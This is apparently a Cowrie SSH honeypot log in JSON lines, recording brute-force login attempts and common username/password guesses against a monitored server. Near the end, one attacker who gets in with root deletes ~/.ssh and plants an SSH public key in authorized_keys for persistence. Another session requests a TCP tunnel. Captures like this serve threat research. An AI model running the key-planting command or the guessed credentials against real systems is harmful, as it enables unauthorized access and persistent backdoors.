{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:55:30.520320Z","src_ip":"212.227.235.229","session":"a3ba1ca75a3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:55:30.521425Z","src_ip":"212.227.235.229","session":"a3ba1ca75a3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51146,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b8b4c06c7b3","protocol":"ssh","message":"New connection: 212.227.235.229:51146 (1.2.3.4:22) [session: 7b8b4c06c7b3]","sensor":"my-vps","timestamp":"2025-08-26T13:55:30.747085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:55:30.748265Z","src_ip":"212.227.235.229","session":"7b8b4c06c7b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:55:30.977120Z","src_ip":"212.227.235.229","session":"7b8b4c06c7b3"}
{"eventid":"cowrie.session.closed","duration":"22.5","message":"Connection lost after 22.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:55:32.085640Z","src_ip":"212.227.125.160","session":"f13bd106f64c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43210,"dst_ip":"1.2.3.4","dst_port":22,"session":"19b6e8c77bf8","protocol":"ssh","message":"New connection: 212.227.125.160:43210 (1.2.3.4:22) [session: 19b6e8c77bf8]","sensor":"my-vps","timestamp":"2025-08-26T13:55:32.443584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:55:32.465071Z","src_ip":"212.227.125.160","session":"19b6e8c77bf8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:55:32.531751Z","src_ip":"212.227.235.229","session":"7b8b4c06c7b3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:55:32.693486Z","src_ip":"212.227.125.160","session":"19b6e8c77bf8"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:55:34.536068Z","src_ip":"212.227.235.229","session":"7b8b4c06c7b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55180,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c1cb6a3f173","protocol":"ssh","message":"New connection: 212.227.235.229:55180 (1.2.3.4:22) [session: 9c1cb6a3f173]","sensor":"my-vps","timestamp":"2025-08-26T13:55:34.795243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:55:34.795969Z","src_ip":"212.227.235.229","session":"9c1cb6a3f173"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:55:35.038982Z","src_ip":"212.227.235.229","session":"9c1cb6a3f173"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-26T13:55:35.195863Z","src_ip":"212.227.125.160","session":"19b6e8c77bf8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:55:36.048775Z","src_ip":"212.227.235.229","session":"9c1cb6a3f173"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:55:36.291608Z","src_ip":"212.227.235.229","session":"a3ba1ca75a3c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:55:36.292646Z","src_ip":"212.227.235.229","session":"9c1cb6a3f173"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:55:37.571430Z","src_ip":"212.227.125.160","session":"19b6e8c77bf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59071,"dst_ip":"1.2.3.4","dst_port":22,"session":"fadf4d8920bc","protocol":"ssh","message":"New connection: 212.227.235.229:59071 (1.2.3.4:22) [session: fadf4d8920bc]","sensor":"my-vps","timestamp":"2025-08-26T13:55:43.990592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:55:43.992525Z","src_ip":"212.227.235.229","session":"fadf4d8920bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:55:44.223505Z","src_ip":"212.227.235.229","session":"fadf4d8920bc"}
{"eventid":"cowrie.login.failed","username":"valeria","password":"valeria","message":"login attempt [valeria/valeria] failed","sensor":"my-vps","timestamp":"2025-08-26T13:55:45.356406Z","src_ip":"212.227.235.229","session":"fadf4d8920bc"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:55:46.556071Z","src_ip":"212.227.235.229","session":"fadf4d8920bc"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":42217,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbbdeb5bcad8","protocol":"ssh","message":"New connection: 80.94.95.15:42217 (1.2.3.4:22) [session: cbbdeb5bcad8]","sensor":"my-vps","timestamp":"2025-08-26T13:56:10.568407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T13:56:10.569286Z","src_ip":"80.94.95.15","session":"cbbdeb5bcad8"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T13:56:10.635091Z","src_ip":"80.94.95.15","session":"cbbdeb5bcad8"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo","message":"login attempt [rodolfo/rodolfo] failed","sensor":"my-vps","timestamp":"2025-08-26T13:56:10.981097Z","src_ip":"80.94.95.15","session":"cbbdeb5bcad8"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo1","message":"login attempt [rodolfo/rodolfo1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:56:12.048442Z","src_ip":"80.94.95.15","session":"cbbdeb5bcad8"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo123","message":"login attempt [rodolfo/rodolfo123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:56:13.116745Z","src_ip":"80.94.95.15","session":"cbbdeb5bcad8"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo1234","message":"login attempt [rodolfo/rodolfo1234] failed","sensor":"my-vps","timestamp":"2025-08-26T13:56:14.185066Z","src_ip":"80.94.95.15","session":"cbbdeb5bcad8"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo12345","message":"login attempt [rodolfo/rodolfo12345] failed","sensor":"my-vps","timestamp":"2025-08-26T13:56:15.252898Z","src_ip":"80.94.95.15","session":"cbbdeb5bcad8"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:16.321252Z","src_ip":"80.94.95.15","session":"cbbdeb5bcad8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23216,"dst_ip":"1.2.3.4","dst_port":22,"session":"7aa14c707efc","protocol":"ssh","message":"New connection: 212.227.125.160:23216 (1.2.3.4:22) [session: 7aa14c707efc]","sensor":"my-vps","timestamp":"2025-08-26T13:56:18.273410Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:18.274487Z","src_ip":"212.227.125.160","session":"7aa14c707efc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23472,"dst_ip":"1.2.3.4","dst_port":22,"session":"07e52fd35aa8","protocol":"ssh","message":"New connection: 212.227.125.160:23472 (1.2.3.4:22) [session: 07e52fd35aa8]","sensor":"my-vps","timestamp":"2025-08-26T13:56:18.389566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:56:18.390519Z","src_ip":"212.227.125.160","session":"07e52fd35aa8"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T13:56:18.506277Z","src_ip":"212.227.125.160","session":"07e52fd35aa8"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:56:18.855379Z","src_ip":"212.227.125.160","session":"07e52fd35aa8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T13:56:18.971203Z","session":"07e52fd35aa8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59670,"dst_ip":"1.2.3.4","dst_port":22,"session":"87fc4c246199","protocol":"ssh","message":"New connection: 217.72.205.35:59670 (1.2.3.4:22) [session: 87fc4c246199]","sensor":"my-vps","timestamp":"2025-08-26T13:56:26.086389Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:26.087568Z","src_ip":"217.72.205.35","session":"87fc4c246199"}
{"eventid":"cowrie.session.connect","src_ip":"113.141.82.238","src_port":37618,"dst_ip":"1.2.3.4","dst_port":22,"session":"c71afa254f0b","protocol":"ssh","message":"New connection: 113.141.82.238:37618 (1.2.3.4:22) [session: c71afa254f0b]","sensor":"my-vps","timestamp":"2025-08-26T13:56:27.916747Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:56:28.819342Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:56:28.820026Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.login.success","username":"root","password":"zx123456","message":"login attempt [root/zx123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:56:29.734778Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:31.602504Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:56:31.603422Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:56:31.604261Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:56:31.833739Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:56:32.357129Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:56:32.357839Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:56:33.050995Z","src_ip":"113.141.82.238","session":"c71afa254f0b"}
